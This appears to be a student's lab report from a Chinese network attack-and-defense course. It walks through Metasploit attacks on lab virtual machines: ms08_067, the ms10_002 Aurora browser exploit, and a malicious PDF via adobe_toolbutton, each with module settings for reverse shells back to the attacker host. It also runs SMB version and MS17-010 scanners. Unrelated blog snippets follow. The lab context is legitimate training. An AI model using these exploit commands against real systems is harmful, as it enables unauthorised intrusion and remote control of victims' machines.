20155201 网络攻防技术 实验五 MSF基础应用

Wesley13
• 阅读 635

20155201 网络攻防技术 实验五 MSF基础应用

一、实践内容

  • 一个主动攻击实践,如ms08_067
  • 一个针对浏览器的攻击,如ms11_050
  • 一个针对客户端的攻击,如Adobe
  • 成功应用任何一个辅助模块

二、报告内容:

1. 基础问题回答

1)用自己的话解释什么是exploit,payload,encode.

  1. exploit:把负责攻击靶机的代码或者程序传送到靶机上
  2. payload:载荷,exploit传送的内容
  3. encode:编码方式,可以修改载荷的编码方式让载荷不容易被发现。

2)离实战还缺什么步骤

那个adobe的实践令我眼前一亮,不过其实首先要先与被攻击的电脑在同一网段,其次需要他的操作系统和reader等级都不高,还没打过补丁,这在现实中不太可能存在。。想要成为高手还是得自己找软件的漏洞,还是需要学习。。

2. 实践总结与体会

本次实验的重点在于实践,对于辅助模块的了解、查看文档、说明和使用,通过对msfconsolo命令的操作和使用,对其更加了解和熟练。

3. 实践过程记录

  1. 一个主动攻击实践,如ms08_067
  2. 一个针对浏览器的攻击,如ms11_050
  3. 一个针对客户端的攻击,如Adobe
  4. 成功应用任何一个辅助模块

一个主动攻击实践,如ms08_067

  1. 在kali终端中,输入msfconsole以进入metasploit的控制台

  2. 进入msfconsole中,在msf模式下查找与其相关的漏洞攻击程序search ms08_067,看到exploit/windows/smb/ms08_067_netapi的信息 20155201 网络攻防技术 实验五 MSF基础应用

    use exploit/windows/smb/ms08_067_netapi \使用模块 set payload generic/shell_reverse_tcp \设置载荷种类,通过反向连接来获取shell的generic/shell_reverse_tcp当payload set LHOST 10.211.55.5 set LPORT 5201 set RHOST 10.211.55.12 exploit

  3. 这里攻击失败了 20155201 网络攻防技术 实验五 MSF基础应用

想起来还没ping过,ping了一下没通,尝试关闭Windows XP防火墙 20155201 网络攻防技术 实验五 MSF基础应用

20155201 网络攻防技术 实验五 MSF基础应用

20155201 网络攻防技术 实验五 MSF基础应用

  1. 攻击成功,得到一个shell,查看系统信息 20155201 网络攻防技术 实验五 MSF基础应用

一个针对浏览器的攻击,如ms11_050

先选用ms11_050模块,攻击win7 ie8,结果ie停止工作。。 20155201 网络攻防技术 实验五 MSF基础应用 20155201 网络攻防技术 实验五 MSF基础应用

  1. 在msf模式下查找与其相关的漏洞攻击程序search ms10_002,看到exploit/windows/browser/ms10_002_aurora的信息 20155201 网络攻防技术 实验五 MSF基础应用

  2. 设置参数

    msf exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp //payload => windows/meterpreter/reverse_tcp msf exploit(windows/browser/ms10_002_aurora) > set LHOST 10.211.55.5 //LHOST => 10.211.55.5 msf exploit(windows/browser/ms10_002_aurora) > set LPORT 5201 //LPORT => 5201 msf exploit(windows/browser/ms10_002_aurora) > set URIPATH lzw //URIPATH => lzw msf exploit(windows/browser/ms10_002_aurora) > exploit

  3. 使用exploit指令执行漏洞,可以看到生成了一个url: 20155201 网络攻防技术 实验五 MSF基础应用

  4. 在当前会话输入sessions -i, 4(具体数值是多少看自己的当前会话)成功获取靶机的shell,可以对其进行操作

20155201 网络攻防技术 实验五 MSF基础应用

20155201 网络攻防技术 实验五 MSF基础应用

一个针对客户端的攻击,如adobe_toolbutton

  1. 同样套路 ,先search adobe

  2. 设置参数

    msf > use exploit/windows/fileformat/adobe_toolbutton msf exploit(windows/fileformat/adobe_toolbutton) > set payload windows/meterpreter/reverse_tcp //payload => windows/meterpreter/reverse_tcp msf exploit(windows/fileformat/adobe_toolbutton) > set LHOST 10.211.55.5 //LHOST => 10.211.55.5 msf exploit(windows/fileformat/adobe_toolbutton) > set LPORT 5201 //LPORT => 5201 msf exploit(windows/fileformat/adobe_toolbutton) > set FILENAME README.pdf //FILENAME => README.pdf

  3. 之后查看一下相关设置 20155201 网络攻防技术 实验五 MSF基础应用

  4. exploit一下

    [*] Creating 'README.pdf' file... [+] README.pdf stored at /root/.msf4/local/README.pdf

记下来生成pdf的位置,直接cp拷出来,然后往xp里面一拖

cp /root/.msf4/local/README.pdf ~
[*] exec: cp /root/.msf4/local/README.pdf ~
  1. 使用exploit/multi/handler模块监听xp

    msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp //payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set LHOST 10.211.55.5 //LHOST => 10.211.55.5 msf exploit(multi/handler) > set LPORT 5201 //LPORT => 5201 msf exploit(multi/handler) > exploit

  2. 下载adobe reader,将拷贝出来的载荷pdf打开,回连成功 20155201 网络攻防技术 实验五 MSF基础应用

成功应用任何一个辅助模块

  1. metasploit模块目录里面看看/usr/share/metasploit-framework/modules
  2. 先选个auxiliary/scanner/smb/smb_version,这个模块的作用是扫描操作系统信息 查看一下需要设置哪些参数: 20155201 网络攻防技术 实验五 MSF基础应用

扫描范围,线程数 3. 设置参数,包括扫描范围

msf auxiliary(scanner/smb/smb_version) > set RHOSTS 10.211.55.1/24
RHOSTS => 10.211.55.1/24
msf auxiliary(scanner/smb/smb_version) > set threads 8
threads => 8
msf auxiliary(scanner/smb/smb_version) > run

[+] 10.211.55.6:445       - Host is running Windows 7 Professional SP1 (build:7601) (name:C3F2) (workgroup:WORKGROUP )
[*] 10.211.55.2:445       - Host could not be identified:  ()
[*] Scanned  26 of 256 hosts (10% complete)
[*] Scanned  52 of 256 hosts (20% complete)
[*] Scanned  77 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

扫描操作系统结果:windows 7 Professional SP1,设备名C3F2 20155201 网络攻防技术 实验五 MSF基础应用 4. 其实做上面的辅助模块之前我本来是想做一个永恒之蓝漏洞的。。 永恒之蓝是指2017年5月12日起,全球范围内爆发的基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。——from百度百科,windows/smb/ms17_010_eternalblue这个,但是我发现怎么都不成 5. 然后有一个辅助扫描是可以扫描主机是否具有该漏洞和被攻击的可能性,我扫描了下,结果。。没有。。。。 6. 辅助模块auxiliary/scanner/smb/smb_ms17_010 设置参数只需设置主机网段,之后run就可以了

msf exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.211.55.6
//RHOSTS => 10.211.55.6
msf auxiliary(scanner/smb/smb_ms17_010) > run

[-] 10.211.55.6:445       - Host does NOT appear vulnerable.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

没有永恒之蓝的漏洞,不知该哭还是该笑。。

点赞
收藏
评论区
推荐文章
blmius blmius
3年前
MySQL:[Err] 1292 - Incorrect datetime value: ‘0000-00-00 00:00:00‘ for column ‘CREATE_TIME‘ at row 1
文章目录问题用navicat导入数据时,报错:原因这是因为当前的MySQL不支持datetime为0的情况。解决修改sql\mode:sql\mode:SQLMode定义了MySQL应支持的SQL语法、数据校验等,这样可以更容易地在不同的环境中使用MySQL。全局s
皕杰报表之UUID
​在我们用皕杰报表工具设计填报报表时,如何在新增行里自动增加id呢?能新增整数排序id吗?目前可以在新增行里自动增加id,但只能用uuid函数增加UUID编码,不能新增整数排序id。uuid函数说明:获取一个UUID,可以在填报表中用来创建数据ID语法:uuid()或uuid(sep)参数说明:sep布尔值,生成的uuid中是否包含分隔符'',缺省为
待兔 待兔
4个月前
手写Java HashMap源码
HashMap的使用教程HashMap的使用教程HashMap的使用教程HashMap的使用教程HashMap的使用教程22
Jacquelyn38 Jacquelyn38
3年前
2020年前端实用代码段,为你的工作保驾护航
有空的时候,自己总结了几个代码段,在开发中也经常使用,谢谢。1、使用解构获取json数据let jsonData  id: 1,status: "OK",data: 'a', 'b';let  id, status, data: number   jsonData;console.log(id, status, number )
Peter20 Peter20
3年前
mysql中like用法
like的通配符有两种%(百分号):代表零个、一个或者多个字符。\(下划线):代表一个数字或者字符。1\.name以"李"开头wherenamelike'李%'2\.name中包含"云",“云”可以在任何位置wherenamelike'%云%'3\.第二个和第三个字符是0的值wheresalarylike'\00%'4\
Wesley13 Wesley13
3年前
mysql设置时区
mysql设置时区mysql\_query("SETtime\_zone'8:00'")ordie('时区设置失败,请联系管理员!');中国在东8区所以加8方法二:selectcount(user\_id)asdevice,CONVERT\_TZ(FROM\_UNIXTIME(reg\_time),'08:00','0
Wesley13 Wesley13
3年前
00:Java简单了解
浅谈Java之概述Java是SUN(StanfordUniversityNetwork),斯坦福大学网络公司)1995年推出的一门高级编程语言。Java是一种面向Internet的编程语言。随着Java技术在web方面的不断成熟,已经成为Web应用程序的首选开发语言。Java是简单易学,完全面向对象,安全可靠,与平台无关的编程语言。
Stella981 Stella981
3年前
Django中Admin中的一些参数配置
设置在列表中显示的字段,id为django模型默认的主键list_display('id','name','sex','profession','email','qq','phone','status','create_time')设置在列表可编辑字段list_editable
Wesley13 Wesley13
3年前
MySQL部分从库上面因为大量的临时表tmp_table造成慢查询
背景描述Time:20190124T00:08:14.70572408:00User@Host:@Id:Schema:sentrymetaLast_errno:0Killed:0Query_time:0.315758Lock_
Python进阶者 Python进阶者
10个月前
Excel中这日期老是出来00:00:00,怎么用Pandas把这个去除
大家好,我是皮皮。一、前言前几天在Python白银交流群【上海新年人】问了一个Pandas数据筛选的问题。问题如下:这日期老是出来00:00:00,怎么把这个去除。二、实现过程后来【论草莓如何成为冻干莓】给了一个思路和代码如下:pd.toexcel之前把这